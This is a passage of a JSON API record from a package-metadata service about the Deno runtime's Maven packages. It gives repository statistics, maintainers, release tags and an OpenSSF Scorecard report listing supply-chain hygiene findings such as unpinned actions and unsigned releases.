authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm:deno/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm:deno/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm:deno/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm:deno/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm:deno/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm:deno/codemeta","maintainers":[],"registry":{"name":"repo1.maven.org","url":"https://maven-central.storage-download.googleapis.com/maven2","ecosystem":"maven","default":true,"packages_count":620154,"maintainers_count":0,"namespaces_count":82381,"keywords_count":36851,"github":"maven-central","metadata":{"funded_packages_count":48065,"rate_limit":2},"icon_url":"https://github.com/maven-central.png","created_at":"2022-07-21T16:40:13.074Z","updated_at":"2026-09-01T05:04:44.165Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/namespaces"}},{"id":12600317,"name":"org.mvnpm.at.deno:darwin-arm64","ecosystem":"maven","description":"darwin-arm64 distribution of Deno","homepage":"https://deno.land","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":"org.mvnpm.at.deno","versions_count":19,"first_release_published_at":"2025-10-20T11:26:26.000Z","latest_release_published_at":"2026-08-29T02:09:39.000Z","latest_release_number":"2.9.6","last_synced_at":"2026-08-29T21:56:52.859Z","created_at":"2025-12-18T17:01:25.222Z","updated_at":"2026-08-29T21:56:52.859Z","registry_url":"https://central.sonatype.com/artifact/org.mvnpm.at.deno/darwin-arm64/","install_command":null,"documentation_url":"https://appdoc.app/artifact/org.mvnpm.at.deno/darwin-arm64/","metadata":{"repositories":["https://repo.maven.apache.org/maven2"]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/